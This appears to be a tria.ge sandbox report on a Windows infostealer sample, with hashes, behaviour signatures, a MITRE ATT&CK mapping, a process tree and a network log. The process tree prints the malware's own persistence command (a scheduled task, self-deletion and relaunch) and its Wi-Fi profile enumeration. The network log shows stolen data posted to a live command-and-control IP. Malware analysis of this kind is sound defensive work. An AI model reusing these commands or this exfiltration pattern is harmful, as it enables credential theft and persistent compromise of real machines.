Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
42s -
max time network
140s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
06/10/2024, 01:01 UTC
General
-
Target
1478772a2208da0b42fd08d2e4f3506259d09c50b5af093471d6c874bf19b399.exe
-
Size
4.8MB
-
MD5
98512fdc1d3b34e2196ca5b34e14f29c
-
SHA1
460f2bbed2bc7419c1664d7f8a9e284e5b9bea83
-
SHA256
1478772a2208da0b42fd08d2e4f3506259d09c50b5af093471d6c874bf19b399
-
SHA512
ba83759ab4a14007c8344fa665329898d520f640cfab6ec7b177b191f423aa9ec9d07577d64fe11d3cbf56be1744f2e66c1fd0c8a6529fd867377e62445cd6a0
-
SSDEEP
3072:patWqvozZqlXS99bMRfCh+T5bOCYEu05ukO3JJ:pMWqcIXS99bMZ5sCYE7O3P
Score
7/10
Malware Config
Signatures
-
Deletes itself 1 IoCs
-
Executes dropped EXE 2 IoCs
-
Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Delays execution with timeout.exe 1 IoCs
-
Modifies system certificate store 2 TTPs 3 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 42 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\1478772a2208da0b42fd08d2e4f3506259d09c50b5af093471d6c874bf19b399.exe"C:\Users\Admin\AppData\Local\Temp\1478772a2208da0b42fd08d2e4f3506259d09c50b5af093471d6c874bf19b399.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "1478772a2208da0b42fd08d2e4f3506259d09c50b5af093471d6c874bf19b399" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Starlabs\1478772a2208da0b42fd08d2e4f3506259d09c50b5af093471d6c874bf19b399.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\1478772a2208da0b42fd08d2e4f3506259d09c50b5af093471d6c874bf19b399.exe" &&START "" "C:\Users\Admin\AppData\Local\Starlabs\1478772a2208da0b42fd08d2e4f3506259d09c50b5af093471d6c874bf19b399.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650013⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 33⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "1478772a2208da0b42fd08d2e4f3506259d09c50b5af093471d6c874bf19b399" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Starlabs\1478772a2208da0b42fd08d2e4f3506259d09c50b5af093471d6c874bf19b399.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Local\Starlabs\1478772a2208da0b42fd08d2e4f3506259d09c50b5af093471d6c874bf19b399.exe"C:\Users\Admin\AppData\Local\Starlabs\1478772a2208da0b42fd08d2e4f3506259d09c50b5af093471d6c874bf19b399.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {9BBAB288-0384-4BA1-AC14-F68161A44BE2} S-1-5-21-457978338-2990298471-2379561640-1000:WOUOSVRD\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Starlabs\1478772a2208da0b42fd08d2e4f3506259d09c50b5af093471d6c874bf19b399.exeC:\Users\Admin\AppData\Local\Starlabs\1478772a2208da0b42fd08d2e4f3506259d09c50b5af093471d6c874bf19b399.exe2⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
-
C:\Windows\system32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650014⤵
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
-
-
C:\Windows\system32\findstr.exefindstr /R /C:"[ ]:[ ]"4⤵
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650014⤵
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid4⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\system32\findstr.exefindstr "SSID BSSID Signal"4⤵
-
-
-
Network
-
DNSgithub.comRemote address:8.8.8.8:53Requestgithub.comIN AResponsegithub.comIN A20.26.156.215 -
GEThttps://github.com/matinrco/tor/releases/download/v0.4.5.10/tor-expert-bundle-v0.4.5.10.zipRemote address:20.26.156.215:443RequestGET /matinrco/tor/releases/download/v0.4.5.10/tor-expert-bundle-v0.4.5.10.zip HTTP/1.1
Host: github.com
Connection: Keep-Alive
ResponseHTTP/1.1 302 Found
Server: GitHub.com
Date: Sun, 06 Oct 2024 01:01:55 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/146779096/943f13f9-3eb9-4042-8722-d95f026c8b09?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241006%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241006T010155Z&X-Amz-Expires=300&X-Amz-Signature=baaf5c3ae9bec2858bbeb03fe2531291a945ac2acce42d718a2167041c3e06c3&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dtor-expert-bundle-v0.4.5.10.zip&response-content-type=application%2Foctet-stream
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: C03D:90977:891128:9E19B0:6701E18F
-
DNSobjects.githubusercontent.comRemote address:8.8.8.8:53Requestobjects.githubusercontent.comIN AResponseobjects.githubusercontent.comIN A185.199.109.133objects.githubusercontent.comIN A185.199.110.133objects.githubusercontent.comIN A185.199.111.133objects.githubusercontent.comIN A185.199.108.133
-
DNSip-api.comRemote address:8.8.8.8:53Requestip-api.comIN AResponseip-api.comIN A208.95.112.1
-
GEThttp://ip-api.com/line?fields=query,countryRemote address:208.95.112.1:80RequestGET /line?fields=query,country HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Sun, 06 Oct 2024 01:02:10 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 29
Access-Control-Allow-Origin: *
X-Ttl: 50
X-Rl: 43
-
POSThttp://185.80.128.17:8080/sendData?pk=REU1MkNBNTZBOTkwNzA4MkMxNzE0NDE2MkNDMjhGMjQ=&ta=U3lzRGlnSU5D&un=QWRtaW4=&pc=V09VT1NWUkQ=&co=VW5pdGVkIEtpbmdkb20=&wa=MA==&be=MQ==Remote address:185.80.128.17:8080RequestPOST /sendData?pk=REU1MkNBNTZBOTkwNzA4MkMxNzE0NDE2MkNDMjhGMjQ=&ta=U3lzRGlnSU5D&un=QWRtaW4=&pc=V09VT1NWUkQ=&co=VW5pdGVkIEtpbmdkb20=&wa=MA==&be=MQ== HTTP/1.1
Host: 185.80.128.17:8080
Content-Length: 106693
Expect: 100-continue
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Length: 36
Content-Type: application/json
Date: Sun, 06 Oct 2024 01:02:13 GMT
Server: waitress
-
GEThttp://185.80.128.17:8080/mnemonic-verify/BFEBFBFF000206D7/DE52CA56A9907082C17144162CC28F24Remote address:185.80.128.17:8080RequestGET /mnemonic-verify/BFEBFBFF000206D7/DE52CA56A9907082C17144162CC28F24 HTTP/1.1
Host: 185.80.128.17:8080
ResponseHTTP/1.1 200 OK
Content-Length: 1
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Oct 2024 01:02:16 GMT
Server: waitress
-
127.0.0.1:3056 -
20.26.156.215:443https://github.com/matinrco/tor/releases/download/v0.4.5.10/tor-expert-bundle-v0.4.5.10.ziptls, http
HTTP Request
GET https://github.com/matinrco/tor/releases/download/v0.4.5.10/tor-expert-bundle-v0.4.5.10.zipHTTP Response
302 -
185.199.109.133:443objects.githubusercontent.comtls
-
208.95.112.1:80http://ip-api.com/line?fields=query,countryhttp
HTTP Request
GET http://ip-api.com/line?fields=query,countryHTTP Response
200 -
185.80.128.17:8080http://185.80.128.17:8080/mnemonic-verify/BFEBFBFF000206D7/DE52CA56A9907082C17144162CC28F24http
HTTP Request
POST http://185.80.128.17:8080/sendData?pk=REU1MkNBNTZBOTkwNzA4MkMxNzE0NDE2MkNDMjhGMjQ=&ta=U3lzRGlnSU5D&un=QWRtaW4=&pc=V09VT1NWUkQ=&co=VW5pdGVkIEtpbmdkb20=&wa=MA==&be=MQ==HTTP Response
200HTTP Request
GET http://185.80.128.17:8080/mnemonic-verify/BFEBFBFF000206D7/DE52CA56A9907082C17144162CC28F24HTTP Response
200 -
185.80.128.17:80
-
8.8.8.8:53github.comdns
DNS Request
github.com
DNS Response
20.26.156.215
-
8.8.8.8:53objects.githubusercontent.comdns
DNS Request
objects.githubusercontent.com
DNS Response
185.199.109.133185.199.110.133185.199.111.133185.199.108.133
-
8.8.8.8:53ip-api.comdns
DNS Request
ip-api.com
DNS Response
208.95.112.1
MITRE ATT&CK Enterprise v15
Persistence
Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Modify Registry
1Subvert Trust Controls
1Install Root Certificate
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
1Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.8MB
MD598512fdc1d3b34e2196ca5b34e14f29c
SHA1460f2bbed2bc7419c1664d7f8a9e284e5b9bea83
SHA2561478772a2208da0b42fd08d2e4f3506259d09c50b5af093471d6c874bf19b399
SHA512ba83759ab4a14007c8344fa665329898d520f640cfab6ec7b177b191f423aa9ec9d07577d64fe11d3cbf56be1744f2e66c1fd0c8a6529fd867377e62445cd6a0
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
4KB
-
Filesize
208KB
-
Filesize
9.9MB
-
Filesize
9.9MB
-
Filesize
208KB